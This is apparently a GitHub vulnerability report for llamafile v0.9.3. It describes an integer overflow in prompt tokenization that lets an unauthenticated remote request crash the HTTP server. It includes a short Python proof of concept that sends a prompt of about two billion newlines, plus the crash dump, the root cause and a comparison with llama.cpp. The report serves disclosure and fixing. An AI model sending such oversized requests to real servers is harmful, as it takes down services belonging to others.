-
Notifications
You must be signed in to change notification settings - Fork 1.3k
Description
Contact Details
What happened?
Launching llamafile with any GGUF file:
./llamafile --host 0.0.0.0 -m /data/ylwang/Projects/llamafile/test++/0.gguf
Proof of Concept (PoC)
Open another terminal and run:
python3 3.py
where 3.py contains:
import requests
resp = requests.post(
"http://127.0.0.1:8080/completion",
json={
"prompt": "\n" * 2147483648,
"n_predict": 20
}
)
print(resp.json())
After a short period, llamafile terminates with:
>>> libc++abi: terminating due to uncaught exception of type std::length_error: vector
error: Uncaught SIGABRT (SI_TKILL) at 0x3f10017a4c2 on XXF-GPU-03 pid 1549506 tid 1549508
./llamafile
No error information
Linux Cosmopolitan 3.9.7 MODE=x86_64; #150-Ubuntu SMP Sat Apr 12 06:00:09 UTC 2025 XXF-GPU-03 5.15.0-140-generic
RAX 0000000000000000 RBX 0000000000000006 RDI 000000000017a4c4
RCX 00000000009ae101 RDX 0000000000000000 RSI 0000000000000006
RBP 00007fcda6d890c0 RSP 00007fcda6d890c0 RIP 00000000009ae101
R8 0000000000000000 R9 0000000000000000 R10 00000000009ae101
R11 0000000000000296 R12 0000000000b6b4e8 R13 00000000009c3000
R14 0000000000b6b4d0 R15 00007fcda6d893c0
TLS 00007fcda7bebd00
XMM0 00000000000000000000000000000000 XMM8 00000000000000000000000035800000
XMM1 00000000000000000000000000000000 XMM9 755f6e66662e64252e6b6c622e636e65
XMM2 000000000000000000007fcda6d881e0 XMM10 00000000000000000000000000000000
XMM3 726573753e7c74726174735f6d697c3c XMM11 00000000000000000000000000000000
XMM4 000000000000705f6c61636970797412 XMM12 00000000000000000000000000000000
XMM5 00000000000000000000000000000000 XMM13 00000000000000000000000000000000
XMM6 00007a5f7366740a00007fcda6d89530 XMM14 00000000000000000000000000000000
XMM7 00007fcda6d898f000006b5f706f740a XMM15 00000000000000000000000000000000
cosmoaddr2line /data/ylwang/Projects/llamafile/out/bin/llamafile 9ae101 99700b 4078c5 9c2eaa 9c2fae 96f126 96ed52 428bf1 429fdb 458120 4a4c63 574f46 574efb 48599e 47f2a4 44c1af 44337d 521db5 97a384 98c884 9fc9c7
0x00000000009ae101: ?? ??:0
0x000000000099700b: ?? ??:0
0x00000000004078c5: ?? ??:0
0x00000000009c2eaa: ?? ??:0
0x00000000009c2fae: ?? ??:0
0x000000000096f126: ?? ??:0
0x000000000096ed52: ?? ??:0
0x0000000000428bf1: ?? ??:0
0x0000000000429fdb: ?? ??:0
0x0000000000458120: ?? ??:0
0x00000000004a4c63: ?? ??:0
0x0000000000574f46: ?? ??:0
0x0000000000574efb: ?? ??:0
0x000000000048599e: ?? ??:0
0x000000000047f2a4: ?? ??:0
0x000000000044c1af: ?? ??:0
0x000000000044337d: ?? ??:0
0x0000000000521db5: ?? ??:0
0x000000000097a384: ?? ??:0
0x000000000098c884: ?? ??:0
0x00000000009fc9c7: ?? ??:0
000000400000-000000b851e0 r-x-- 7700kb
000000b86000-000003306000 rw--- 40mb
0006fe000000-0006fe001000 rw-pa 4096b
7fc927f05000-7fcb9b305000 rw-pa 10gb
7fcbec905000-7fcc6cb05000 rw-pa 2050mb
7fcd0cd05000-7fcd8efe1fc0 rw-pa 2083mb
7fcd8efe2000-7fcd8f212fc0 rw-pa 2244kb
7fcd8f213000-7fcd8f42ffc0 rw-pa 2164kb
7fcd8f430000-7fcd8f660fc0 rw-pa 2244kb
7fcd8f661000-7fcd90757fc0 rw-pa 17mb
7fcd90758000-7fcd90758fc0 rw-pa 4032b
7fcd90759000-7fcd90759fc0 rw-pa 4032b
7fcd9075a000-7fcd9075afc0 rw-pa 4032b
7fcd9075b000-7fcd9076ffc0 rw-pa 84kb
7fcd90770000-7fcd90770fc0 rw-pa 4032b
# 15'345'442'816 bytes in 26 mappings
./llamafile --host 0.0.0.0 -m /data/ylwang/Projects/llamafile/test++/0.gguf
The crash log shows a fatal abort caused by std::length_error while constructing a std::vector.
Root Cause
In ./llama.cpp/common.cpp:2667, the function llama_tokenize calculates the token buffer size as:
int n_tokens = text.length() + 2 * add_special;
std::vector<llama_token> result(n_tokens);
text.length() returns a size_t (64-bit unsigned).
When the user provides an extremely large input (e.g., a prompt of 2,147,483,648 characters), text.length() exceeds the maximum representable value of a 32-bit signed integer. This value is then assigned to int n_tokens, causing an integer overflow, which wraps the result into a negative value.
Printing the value confirms:
n_tokens = -2147483648
This negative size is then passed to the std::vector constructor, resulting in an immediate std::length_error and an uncontrolled termination of the llamafile process.
Impact
A remote attacker who can send requests to the HTTP server can trigger the integer overflow by supplying an extremely large prompt, causing llamafile to abort. This leads to a fully remote, unauthenticated Denial-of-Service condition.
In llama.cpp
In contrast, the standalone llama.cpp binary does enforce a limit on vector size. Running the same request against a model launched directly via llama.cpp:
import requests
resp = requests.post(
"http://127.0.0.1:8080/v1/chat/completions",
json={
"messages": [
{"role": "user", "content": "\n" * 2147483648}
],
"max_tokens": 20
}
)
print(resp.text)
produces a controlled error:
{"error":{"code":500,"message":"cannot create std::vector larger than max_size()","type":"server_error"}}
This demonstrates that llama.cpp itself performs internal bounds checks.
Version
llamafile v0.9.3
What operating system are you seeing the problem on?
Linux
Relevant log output
Please see the ``what happened``.